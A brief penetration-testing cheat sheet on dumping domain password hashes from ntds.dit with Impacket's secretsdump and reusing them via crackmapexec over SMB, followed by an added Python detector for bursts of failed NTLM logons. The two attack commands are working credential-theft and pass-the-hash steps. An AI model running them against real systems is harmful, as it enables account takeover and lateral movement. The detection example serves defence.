Impacket

Secretsdump

  • Requires ntds.dit and the SYSTEM hive (system.hive); both are parsed offline with the LOCAL target
secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt
  • Remove everything but the hashes from the output file
  • Use the hashes to log in on the target
crackmapexec smb $TARGET_IP -u <user> -H hashes.txt
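
Detection side of the last step, as an added example that is not part of the original page: trying a file of hashes against one account typically appears on the target as a run of failed NTLM network logons (event 4625, LogonType 3) from one source, sometimes ending in a success (event 4624). The records, the `ts` field, the helper `ev` and the thresholds are assumptions made for the example; the other field names are those of the Windows Security events.

```python
from collections import defaultdict

def ev(ts, event_id, user, ip, pkg="NTLM", logon_type=3):
    """Build one flattened Security-log record (field names as in events 4624/4625)."""
    return {"ts": ts, "EventID": event_id, "TargetUserName": user, "IpAddress": ip,
            "AuthenticationPackageName": pkg, "LogonType": logon_type}

# Constructed sample data, not real logs. "ts" is seconds since an arbitrary start.
EVENTS = (
    [ev(t, 4625, "svc_backup", "10.0.0.50") for t in range(5)]    # five wrong hashes
    + [ev(5, 4624, "svc_backup", "10.0.0.50")]                    # then a match
    + [ev(2, 4625, "alice", "10.0.0.7"), ev(9, 4624, "alice", "10.0.0.7")]  # one typo
    + [ev(3, 4624, "bob", "10.0.0.8", pkg="Kerberos")]            # normal domain logon
)

def find_hash_spray(events, min_failures=4, window=60):
    """Flag (source IP, account) pairs with a burst of failed NTLM network logons."""
    failures = defaultdict(list)          # (ip, user) -> timestamps of recent 4625s
    alerts = []
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["LogonType"] != 3 or e["AuthenticationPackageName"] != "NTLM":
            continue                      # only NTLM network logons (SMB and similar)
        key = (e["IpAddress"], e["TargetUserName"].lower())
        recent = [t for t in failures[key] if e["ts"] - t <= window]
        if e["EventID"] == 4625:          # failed logon
            failures[key] = recent + [e["ts"]]
        elif e["EventID"] == 4624:        # successful logon
            if len(recent) >= min_failures:
                alerts.append({"ip": key[0], "user": key[1], "failures": len(recent),
                               "outcome": "success-after-burst"})
            failures[key] = []
    for (ip, user), stamps in failures.items():   # bursts that never succeeded
        if len(stamps) >= min_failures:
            alerts.append({"ip": ip, "user": user, "failures": len(stamps),
                           "outcome": "failures-only"})
    return alerts

if __name__ == "__main__":
    for alert in find_hash_spray(EVENTS):
        print(alert)
```

A "success-after-burst" alert is the one to triage first, since it means one of the tried credentials was valid for that account.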